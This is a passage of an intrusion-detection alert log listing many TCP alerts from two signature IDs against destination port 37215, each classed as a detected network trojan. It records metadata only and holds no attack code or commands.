                Timestamp:05/29/24-15:15:39.175121
                SID:2829579
                Source Port:57172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062714
                SID:2829579
                Source Port:53820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180580
                SID:2835222
                Source Port:39258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687288
                SID:2835222
                Source Port:34476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009755
                SID:2829579
                Source Port:44728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944849
                SID:2829579
                Source Port:44150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927888
                SID:2829579
                Source Port:55074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140801
                SID:2835222
                Source Port:49104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958848
                SID:2835222
                Source Port:58016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853875
                SID:2835222
                Source Port:44912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735155
                SID:2829579
                Source Port:49990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920530
                SID:2829579
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781611
                SID:2835222
                Source Port:34372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664218
                SID:2835222
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780791
                SID:2835222
                Source Port:48610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048590
                SID:2829579
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659502
                SID:2835222
                Source Port:33780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950966
                SID:2829579
                Source Port:43722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905024
                SID:2835222
                Source Port:45412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385182
                SID:2829579
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141258
                SID:2835222
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237303
                SID:2829579
                Source Port:35134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336588
                SID:2835222
                Source Port:45682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810372
                SID:2835222
                Source Port:51724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023435
                SID:2835222
                Source Port:48590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957924
                SID:2829579
                Source Port:51982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947166
                SID:2835222
                Source Port:50562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624853
                SID:2829579
                Source Port:49690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289868
                SID:2829579
                Source Port:44904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989147
                SID:2835222
                Source Port:52952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.580061
                SID:2835222
                Source Port:49228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882973
                SID:2835222
                Source Port:60412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364788
                SID:2835222
                Source Port:38534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321532
                SID:2829579
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133368
                SID:2835222
                Source Port:35896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856022
                SID:2829579
                Source Port:58394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223900
                SID:2829579
                Source Port:45868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815650
                SID:2835222
                Source Port:49288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776669
                SID:2835222
                Source Port:60262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837373
                SID:2829579
                Source Port:55228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810317
                SID:2835222
                Source Port:33596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681737
                SID:2835222
                Source Port:48294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521031
                SID:2835222
                Source Port:45242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687868
                SID:2829579
                Source Port:39834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947736
                SID:2829579
                Source Port:55744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520730
                SID:2829579
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.824454
                SID:2835222
                Source Port:40258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171423
                SID:2829579
                Source Port:37044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422195
                SID:2835222
                Source Port:49598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435934
                SID:2835222
                Source Port:55276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364828
                SID:2829579
                Source Port:59398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770769
                SID:2835222
                Source Port:40612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.127719
                SID:2829579
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613268
                SID:2835222
                Source Port:40436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.693847
                SID:2835222
                Source Port:55938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618782
                SID:2835222
                Source Port:36828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074754
                SID:2829579
                Source Port:43022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730709
                SID:2829579
                Source Port:47214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000814
                SID:2835222
                Source Port:36960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075748
                SID:2835222
                Source Port:33250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767576
                SID:2829579
                Source Port:60158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795724
                SID:2829579
                Source Port:33904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842255
                SID:2829579
                Source Port:55066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521631
                SID:2829579
                Source Port:58392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175754
                SID:2829579
                Source Port:46356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977294
                SID:2829579
                Source Port:43404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841440
                SID:2829579
                Source Port:49472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663771
                SID:2835222
                Source Port:55972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032682
                SID:2835222
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980060
                SID:2829579
                Source Port:48386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431214
                SID:2829579
                Source Port:37730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860273
                SID:2829579
                Source Port:34726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811896
                SID:2835222
                Source Port:34874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584149
                SID:2829579
                Source Port:57816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321778
                SID:2835222
                Source Port:46116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586652
                SID:2829579
                Source Port:37486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946339
                SID:2829579
                Source Port:58242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319520
                SID:2835222
                Source Port:42304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025127
                SID:2829579
                Source Port:58000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597898
                SID:2829579
                Source Port:59778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652132
                SID:2835222
                Source Port:46988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982193
                SID:2835222
                Source Port:57348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432689
                SID:2835222
                Source Port:52516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899380
                SID:2829579
                Source Port:45932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283238
                SID:2829579
                Source Port:40846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861929
                SID:2829579
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.276131
                SID:2829579
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949730
                SID:2829579
                Source Port:53156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262579
                SID:2829579
                Source Port:46088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184877
                SID:2835222
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390223
                SID:2835222
                Source Port:34810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466073
                SID:2829579
                Source Port:40694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666481
                SID:2829579
                Source Port:55032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675034
                SID:2835222
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008352
                SID:2829579
                Source Port:49698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583299
                SID:2829579
                Source Port:34330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434284
                SID:2829579
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174841
                SID:2835222
                Source Port:44046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.714614
                SID:2835222
                Source Port:34436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239512
                SID:2835222
                Source Port:34094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328216
                SID:2829579
                Source Port:43058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000992
                SID:2835222
                Source Port:45570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914004
                SID:2829579
                Source Port:50006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976301
                SID:2829579
                Source Port:56728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915298
                SID:2835222
                Source Port:38914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947314
                SID:2829579
                Source Port:60912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019915
                SID:2829579
                Source Port:47288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556842
                SID:2829579
                Source Port:54680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224458
                SID:2829579
                Source Port:44208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359258
                SID:2835222
                Source Port:53070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324372
                SID:2829579
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814529
                SID:2835222
                Source Port:47544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035507
                SID:2835222
                Source Port:45116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141116
                SID:2829579
                Source Port:37304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973216
                SID:2829579
                Source Port:43946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918299
                SID:2835222
                Source Port:44976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500897
                SID:2835222
                Source Port:59094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509882
                SID:2829579
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896144
                SID:2829579
                Source Port:54820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154175
                SID:2829579
                Source Port:43288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286556
                SID:2829579
                Source Port:50544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413642
                SID:2829579
                Source Port:56028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473418
                SID:2835222
                Source Port:57962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510136
                SID:2835222
                Source Port:59642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807272
                SID:2835222
                Source Port:49426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227201
                SID:2829579
                Source Port:41296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586142
                SID:2829579
                Source Port:45138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240475
                SID:2829579
                Source Port:51328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953219
                SID:2829579
                Source Port:45700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573332
                SID:2829579
                Source Port:60882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620309
                SID:2829579
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899516
                SID:2829579
                Source Port:54546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655709
                SID:2829579
                Source Port:35828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184464
                SID:2835222
                Source Port:47330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211998
                SID:2829579
                Source Port:56858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239550
                SID:2829579
                Source Port:48818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890037
                SID:2835222
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942600
                SID:2835222
                Source Port:52502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169189
                SID:2829579
                Source Port:45732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438082
                SID:2829579
                Source Port:41268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745313
                SID:2835222
                Source Port:47154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919652
                SID:2835222
                Source Port:55652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791752
                SID:2835222
                Source Port:47312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189981
                SID:2835222
                Source Port:36572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263773
                SID:2829579
                Source Port:54372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972162
                SID:2835222
                Source Port:50280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000918
                SID:2835222
                Source Port:60998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763257
                SID:2829579
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154525
                SID:2829579
                Source Port:38610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520241
                SID:2835222
                Source Port:59988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883675
                SID:2835222
                Source Port:40544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041159
                SID:2829579
                Source Port:41690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689003
                SID:2829579
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230743
                SID:2835222
                Source Port:41780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171401
                SID:2829579
                Source Port:36516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217971
                SID:2835222
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668789
                SID:2835222
                Source Port:45428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232140
                SID:2835222
                Source Port:55858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713052
                SID:2835222
                Source Port:36924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272463
                SID:2829579
                Source Port:53616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100550
                SID:2835222
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563568
                SID:2835222
                Source Port:38352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736353
                SID:2829579
                Source Port:50330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928983
                SID:2829579
                Source Port:51436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609647
                SID:2835222
                Source Port:52300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810508
                SID:2835222
                Source Port:57102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931862
                SID:2835222
                Source Port:48820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986831
                SID:2835222
                Source Port:45092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226823
                SID:2829579
                Source Port:38676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664427
                SID:2829579
                Source Port:50164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232406
                SID:2829579
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265771
                SID:2835222
                Source Port:52324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786815
                SID:2835222
                Source Port:51624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223096
                SID:2835222
                Source Port:43336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.071603
                SID:2835222
                Source Port:34272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272407
                SID:2835222
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899422
                SID:2835222
                Source Port:56626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640803
                SID:2835222
                Source Port:42332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899260
                SID:2835222
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840834
                SID:2835222
                Source Port:53664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867686
                SID:2835222
                Source Port:34982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559026
                SID:2835222
                Source Port:53990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325400
                SID:2829579
                Source Port:48418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665545
                SID:2835222
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175444
                SID:2829579
                Source Port:43860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515463
                SID:2829579
                Source Port:42844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.998184
                SID:2829579
                Source Port:33370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864228
                SID:2835222
                Source Port:45810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559488
                SID:2829579
                Source Port:50476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668621
                SID:2835222
                Source Port:42362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981924
                SID:2829579
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140324
                SID:2829579
                Source Port:59076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624978
                SID:2835222
                Source Port:55176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125506
                SID:2829579
                Source Port:49324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567904
                SID:2829579
                Source Port:35320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981278
                SID:2829579
                Source Port:47404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834723
                SID:2835222
                Source Port:60594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173496
